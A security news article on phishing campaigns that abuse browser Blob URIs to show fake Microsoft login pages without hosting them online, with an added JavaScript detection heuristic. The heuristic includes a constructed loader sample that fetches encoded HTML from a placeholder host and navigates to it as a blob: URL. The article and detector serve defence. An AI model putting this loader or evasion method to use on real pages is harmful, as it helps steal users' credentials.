- Evades secure email gateways and security tools because the phishing page never touches a real server
- Blob URIs mean the phishing content is never hosted online, so filters never see it coming
- No strange URLs, no dubious domains, just silent credential theft through a fake Microsoft login page
Security researchers have discovered a series of phishing campaigns that use a rarely exploited technique to steal login credentials, even when those credentials are protected by encryption.
New research by Cofense warns that the method relies on Blob URIs, a browser feature designed to display temporary local content, which cybercriminals are now abusing to deliver phishing pages.
A Blob URI is created and accessed entirely within the user’s browser, which means the phishing content never exists on a publicly reachable server. This makes it extremely difficult to detect, even for the most advanced endpoint protection systems.
A stealthy technique that slips past defenses
In these campaigns, the phishing process begins with an email that easily evades secure email gateways (SEGs). These emails typically contain a link to what appears to be a legitimate page, often hosted on trusted domains such as Microsoft OneDrive.
However, this initial page does not host the phishing content directly. Instead, it acts as an intermediary, silently loading an attacker-controlled HTML file that decodes into a Blob URI.
The result is a fake login page rendered inside the victim’s browser, designed to closely mimic the Microsoft login portal.
To the victim, nothing seems out of place: there are no strange URLs or obvious signs of fraud, just a request to log in to view a secure message or access a document. Once they click ‘Locate’, the page redirects to another attacker-controlled HTML file, which generates a local Blob URI that displays the counterfeit login page.
Because Blob URIs work entirely inside the browser’s memory and are inaccessible from outside the session, traditional security tools cannot scan or block the content.
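As an added example (not code from Cofense or from this article), the scanner below shows how a content filter can still catch the intermediary page described above by looking for the delivery chain itself: HTML built into a Blob, turned into a blob: URL, and then navigated to. The indicator weights, the threshold and both sample pages are constructed for this illustration.

```javascript
// Weighted indicators of the Blob URI delivery chain; weights and threshold are assumptions.
const INDICATORS = {
  "html-blob": 3,       // new Blob([...], { type: "text/html" })
  "object-url": 2,      // URL.createObjectURL(...)
  "blob-navigation": 3, // location / iframe.src / window.open pointed at the blob: URL
  "base64-decode": 1,   // atob(...): the page arrives encoded, as in the described chain
  "remote-fetch": 1,    // fetch/XHR: the intermediary pulls attacker HTML at runtime
};

function scanHtml(html) {
  const findings = [];
  const hit = (name) => findings.push(name);

  if (/new\s+Blob\s*\([\s\S]{0,300}?type\s*:\s*["']text\/html["']/i.test(html)) hit("html-blob");

  // Capture the variable the blob: URL is stored in, so the two-step form
  // "const u = URL.createObjectURL(b); location.href = u;" is also caught.
  const objUrl = /(?:(?:const|let|var)\s+(\w+)\s*=\s*)?URL\.createObjectURL\s*\(/.exec(html);
  if (objUrl) {
    hit("object-url");
    const target = objUrl[1] ? `${objUrl[1]}\\b` : "URL\\.createObjectURL";
    const nav = new RegExp(
      `(?:location(?:\\.href)?|\\.src)\\s*=\\s*${target}` +
      `|(?:window\\.open|location\\.(?:assign|replace))\\s*\\(\\s*${target}`
    );
    if (nav.test(html)) hit("blob-navigation");
  }

  if (/\batob\s*\(/.test(html)) hit("base64-decode");
  if (/\bfetch\s*\(|XMLHttpRequest/.test(html)) hit("remote-fetch");

  const score = findings.reduce((sum, f) => sum + INDICATORS[f], 0);
  return { score, findings, verdict: score >= 6 ? "suspicious" : "benign" };
}

// Constructed sample: a legitimate blob: URL used to offer a CSV download (scores 2, benign).
const BENIGN_PAGE = `<script>
  const blob = new Blob([csvText], { type: "text/csv" });
  const a = document.createElement("a");
  a.href = URL.createObjectURL(blob);
  a.download = "report.csv";
</script>`;

// Constructed sample of the intermediary pattern the article describes (scores 10, suspicious).
const SUSPICIOUS_PAGE = `<script>
  fetch("https://example.invalid/page.txt").then(r => r.text()).then(t => {
    const b = new Blob([atob(t)], { type: "text/html" });
    const u = URL.createObjectURL(b);
    location.href = u;
  });
</script>`;
```

Because the decoded phishing page itself is never visible to the scanner, the heuristic deliberately scores the loader rather than the content it produces.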
“This method makes detection and analysis especially complicated,” said Jacob Malimban of Cofense’s intelligence team.
“The phishing page is created and rendered locally using a Blob URI. It is not hosted online, so it cannot be scanned or blocked in the usual way.”
The credentials entered on the counterfeit page are silently exfiltrated to a remote endpoint controlled by the threat actor, leaving the victim unaware.
AI-based security filters also struggle to catch these attacks, since Blob URIs are rarely used maliciously and may be poorly represented in training data. Researchers warn that unless detection methods evolve, this technique is likely to gain traction among attackers.
To defend against such threats, organizations are urged to adopt Firewall-as-a-Service (FWaaS) and Zero Trust Network Access (ZTNA) solutions that can help secure access and flag suspicious login activity.